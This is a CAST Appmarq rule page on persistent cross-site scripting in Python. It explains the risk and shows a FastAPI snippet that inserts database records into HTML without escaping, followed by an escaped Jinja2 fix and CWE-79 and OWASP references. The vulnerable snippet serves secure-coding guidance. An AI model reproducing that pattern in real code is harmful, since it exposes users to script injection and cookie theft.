Avoid cross-site scripting (persistent) (Python)

CRITICAL

Rule Definition
User Input Data entering a web application through an untrusted source and resulting for executing of untrusted code. Only when the untrusted source is a database or any other back-end datastore. Once the malicious script is injected, the attacker can perform a variety of malicious activities. The attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. Phishing attacks could be used to emulate trusted web sites and trick the victim into entering a password, allowing the attacker to compromise the victim's account on that web site. Finally, the script could exploit a vulnerability in the web browser itself possibly taking over the victim's machine, sometimes referred to as "drive-by hacking." In many cases, the attack can be launched without the victim even being aware of it. Even with careful users, attackers frequently use a variety of methods to encode the malicious portion of the attack, such as URL encoding or Unicode, so the request looks less suspicious.

Remediation
Depending on the context: use the framework's sanitization methods, markupsafe module, or html.escape(), use the framework's recommended way of sending JSON and HTML (Jinja template with default escaping).

Violation Code Sample

... app = FastAPI() db = mysql.connector.connect(...) @app.get("/movies") def func(): cursor = db.cursor() # if records can be edited by users and contain dangerous HTML fragments records = cursor.execute("select * from posts").fetchall() return Response(content="<h1>Posts</h1><div>%s</div>" % records) # violation

Fixed Code Sample

... app = FastAPI() templates = Jinja2Templates(directory="templates") db = mysql.connector.connect(...) @app.get("/movies") def func(request: Request): cursor = db.cursor() records = cursor.execute("select * from posts").fetchall() # sanitize the response using a template that escapes HTML tags return templates.TemplateResponse("posts.html", {"request": request, "posts": records})

Reference

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') https://cwe.mitre.org/data/definitions/79.html Open Web Application Security Project (OWASP) https://www.owasp.org/index.php/Top_10-2017_A7-Cross-Site_Scripting_(XSS) CISQ rule: ASCSM-CWE-79. Cross Site Scripting Prevention Cheat Sheet https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

Related Technologies

Health Factor

Security

Technical Criterion
CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

About CAST Appmarq

CAST Appmarq is by far the biggest repository of data about real IT systems. It's built on thousands of analyzed applications, made of 35 different technologies, by over 300 business organizations across major verticals. It provides IT Leaders with factual key analytics to let them know if their applications are on track.

Benchmark Statistics

Global Compliance

nan%

Total Violations

0

Total Opportunities

0

Average Violations / App.

nan

The compliance score represents 1 minus the ratio between the number of times a rule has been violated compared to the number of opportunities in a set of applications that the rule could have been violated.

Industry Insights

Want more stats? Register now!